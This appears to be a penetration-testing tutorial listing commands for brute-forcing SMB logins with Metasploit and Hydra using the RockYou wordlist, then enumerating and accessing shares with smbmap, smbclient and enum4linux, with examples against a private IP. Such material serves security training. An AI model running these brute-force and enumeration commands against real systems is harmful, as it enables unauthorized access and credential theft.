07. SMB Dictionary Attack
Command:
msfconsole
use auxiliary/scanner/smb/smb_login
set rhost <IP Address>
set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt
set smbuser <Username>
run
Explanation:
msfconsole: Starts the Metasploit Framework.use auxiliary/scanner/smb/smb_login: Uses the SMB login brute-force module.set rhost <IP Address>: Specifies the target machine.set pass_file /usr/share/wordlists/metasploit/unix_passwords.txt: Uses a predefined password list.set smbuser <Username>: Specifies the username to test.run: Executes the brute-force attack.
Example Usage:
set rhost 192.168.1.10
set smbuser administrator
set pass_file /usr/share/wordlists/rockyou.txt
run
Command:
gzip -d /usr/share/wordlists/rockyou.txt.gz
Explanation:
gzip -d: Decompresses the RockYou password file./usr/share/wordlists/rockyou.txt.gz: The location of the compressed RockYou password list.
Example Usage:
gzip -d /usr/share/wordlists/rockyou.txt.gz
ls -l /usr/share/wordlists/
3. Brute Force SMB Login Using Hydra
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP Address> smb
Explanation:
hydra: A powerful brute-force tool.-l admin: Specifies the username (admin).-P /usr/share/wordlists/rockyou.txt: Uses RockYou as the password list.<IP Address>: Target system.smb: Specifies the SMB service.
Example Usage:
hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.1.10 smb
4. Checking SMB Shares with Credentials Using SMBMap
Command:
smbmap -H <IP Address> -u admin -p <Password>
Explanation:
smbmap: A tool for SMB enumeration.-H <IP Address>: Specifies the target.-u admin: Specifies the username.-p <Password>: Specifies the password.
Example Usage:
smbmap -H 192.168.1.10 -u administrator -p password123
5. Listing SMB Shares Using SMBClient
Command:
smbclient -L <IP Address> -U <Username>
Explanation:
smbclient: An SMB client tool.-L <IP Address>: Lists available shares on the target.-U <Username>: Specifies the username.
Example Usage:
smbclient -L 192.168.1.10 -U administrator
6. Accessing a Specific SMB Share
Command:
smbclient //<IP Address>/<Share Name> -U <Username>
Explanation:
smbclient //<IP Address>/<Share Name>: Connects to a specific SMB share.-U <Username>: Specifies the username.
Example Usage:
smbclient //192.168.1.10/shared -U administrator
Command:
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set smbuser <Username>
set smbpass <Password>
set rhost <IP Address>
run
Explanation:
use auxiliary/scanner/smb/pipe_auditor: Loads the SMB pipe enumeration module.set smbuser <Username>: Specifies the SMB username.set smbpass <Password>: Specifies the password.set rhost <IP Address>: Specifies the target IP.run: Executes the scan.
Example Usage:
set smbuser administrator
set smbpass password123
set rhost 192.168.1.10
run
8. Enumerating SMB with Enum4linux
Command:
enum4linux -r -u "<Username>" -p "<Password>" <IP Address>
Explanation:
enum4linux: A tool for SMB enumeration.-r: Enumerates RID users and groups.-u "<Username>": Specifies the username.-p "<Password>": Specifies the password.<IP Address>: Specifies the target.
Example Usage:
enum4linux -r -u "administrator" -p "password123" 192.168.1.10